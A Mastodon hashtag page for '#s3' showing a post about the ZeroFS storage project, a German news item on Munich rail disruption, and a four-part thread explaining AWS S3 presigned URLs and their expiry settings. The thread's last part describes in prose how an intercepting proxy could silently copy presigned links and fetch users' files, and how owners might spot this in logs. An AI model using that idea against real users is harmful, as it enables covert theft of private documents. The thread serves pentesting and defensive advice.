mastodontech.de ist einer von vielen unabhängigen Mastodon-Servern, mit dem du dich im Fediverse beteiligen kannst.
Offen für alle (über 16) und bereitgestellt von Markus'Blog

Serverstatistik:

1,4 Tsd.
aktive Profile

#s3

5 Beiträge5 Beteiligte1 Beitrag heute

I don't know if anybody noticed #ZeroFS yet, but it seems there is a completely user space-implementation of #NFS and #blockstorage on top of #S3 #objectstorage: github.com/Barre/zerofs

Including a demo running #ZFS on top of it which essentially allows geo-redundant ZFS volumes: asciinema.org/a/728234 & github.com/Barre/zerofs?tab=re

I don't see no #FreeBSD port yet, but if that really works it would be absolutely awesome.

ZeroFS - The Filesystem That Makes S3 your Primary Storage - Barre/ZeroFS
GitHubGitHub - Barre/ZeroFS: ZeroFS - The Filesystem That Makes S3 your Primary StorageZeroFS - The Filesystem That Makes S3 your Primary Storage - Barre/ZeroFS

„Kein Ersatzkonzept“: Mega-Chaos auf beliebter Bahnstrecke vor München bahnt sich an

Lamborghinis, Porsches und BMWs schieben sich Stoßstange an Stoßstange über die Bundesstraße 318 …
#Muenchen #Munchen #Munich #Deutschland #Deutsch #DE #Schlagzeilen #Headlines #Nachrichten #News #Europe #Europa #EU #München #Bahn #BayerischeRegionalbahn #Bayern #brb #Chaos #Deisenhofen #Feiern #Germany #Giesing #Holzkirchen #S3 #Seefeste #Sperrung #Tegernsee #TegernseerTal
europesays.com/de/245514/

Fortgeführter Thread

If you made some kind of intercepting HTTP/HTTPS proxy (thinking of a #pentester use case here), you could make it search for these URLs in the streams of HTTP and HTML that are passing through the proxy. Copy down the full URLs and asynchronously issue your own requests for the same URLs and store your own copy of the resulting files. The end user still gets their copy and nobody can tell it's happening. You'd almost certainly be able to do this because the links would surely be valid at the time the proxy sees them, and would work if the proxy immediately issued its request for its own copy.

The only way to really detect this happening is for the bucket owner to look at the S3 object logs in CloudTrail and see more than 1 fetch of that URL. Of course, someone with network connectivity issues could issue the request more than once. But a systematic pattern of duplicate fetches would indicate hijinks. The end user can't detect this happening to them. But, of course, you're MitM'ing their internet connection, so that could be detected.

#AWS #S3 #security #pentest
4/end

Fortgeführter Thread

If you know how these things work, I haven't told you anything new or useful yet. Maybe I won't. But the thing I think is important and frequently overlooked is that expiration time. Too short (5 seconds) and your user might not click the link before it expires. Too long (86400 seconds, i.e., one day) and this file is available far longer than you intended.

So looking at the X-Amz-Expires header in #AWS #S3 is a good #security thing, especially if you're doing a #pentest . Those URLs can be passed from device to device (e.g., you can Slack it to a colleague or SMS it to a friend and it will work). So you want to counsel anyone who uses them to try hard to tune the expiration as short as is reasonably practical. That expiration is all of the security control on that link.

[edit: I left out something important]
I see these URLs with 86400 as the expiration time a lot and often. If you're a developer, look at what you're setting them to. If you're a #pentester, this is a thing to warn your customer about.

3/

Fortgeführter Thread

That URL contains everything you need to fetch the object. Whoever has that URL can fetch that object an infinite number of times until the link expires. Here's a redacted example of a link I got like this today.

I click a link in an email, which invokes a lambda function behind an API gateay. It generates an S3 pre-signed URL on the fly and redirects my browser to it. In theory I'm the only person who can fetch this object because I'm the only person with this link. This link has a header and you'll see X-Amz-Date and X-Amz-Expires=600. The link is valid for 600 seconds (10 minutes) after that date. This link works until that time is up.

#AWS #S3
2/

Some info on #AWS #S3 presigned URLs. They're used often when you want to grant anonymous access to something stored in an S3 bucket via https. Frequent uses are things like generating a PDF invoice, report, or other document and then sending the user a link where they can download it. You don't want the doc to live forever and you don't want the link to be valid forever. In order for your web front end to control access, your web front end would have to read from S3 and then stream the file to the user. That costs money in S3 data charges and internet charges to your front end. So S3 pre-signed URLs let you give a time-limited download to your user that is delivered directly from S3 to them. Your web front end doesn't get involved, which is desirable in a few ways.

A couple useful points

🧵1/